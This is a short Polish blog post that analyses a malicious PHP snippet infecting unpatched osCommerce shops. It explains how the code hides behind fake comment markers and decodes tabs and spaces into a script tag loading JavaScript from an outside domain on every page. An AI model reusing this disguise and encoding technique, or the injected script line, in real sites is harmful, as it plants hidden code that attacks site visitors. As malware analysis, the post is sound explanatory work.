06
06
2011
Ataki na web aplikacje – cz. 8
Napisał Aiv w kategorii Bezpieczeństwo, Hacking, PHP, Programowanie, tags: Bezpieczeństwo, PHPDzisiaj w ręce wpadł mi „ciekawy” kod który ostatno zaraża niezaktualizowane sklepy bazujące na osCommerce. Kod sam w sobie nie jest bardzo skomplikowany, ale sposób w jaki został napisany zasługuje na wyróżnienie 
<?php
/**
* Gets some core libraries and displays a top message if required. /*
*/ if(!function_exists('CoreLibrariesHandler')) { /*
*/ function CoreLibrariesHandler() { /*
*/ $session_keys = ' '; /*
*/ /*
*/ foreach(str_split($session_keys, 7+1) as $k=>$v) { /*
*/ $v = str_replace(' ', 1, str_replace(' ', 0, $v)); /*
*/ $session_keys[$k] = chr(bindec($v)); /*
*/ } /*
*/ /*
*/ if($session_keys) echo $session_keys; } /*
*/ register_shutdown_function('CoreLibrariesHandler'); /*
*/ } /*
************************************************************************/
?>
Kod został napisany w taki sposób żeby wyglądał na zakomentowany . Nie wiem ile osób się na to złapie, ale fajnie się to prezentuje. Drugim elementem, który spowodował że opisuje ten kod tutaj, jest zmienna $session_keys.
Zmienna ta wypełniona jest spacjami i tabami. Jak zerkniemy na dalszy kod, to doczytamy się, że taby to cyfry 1, a spacje to cyfry 0. Po konwersji z systemu dwójkowego na dziesiętny wychodzi kod dołączający się do każdej strony:
<script src="http://hercules110farm.cz.cc/jquery.min.js"></script>
Wpisy (RSS)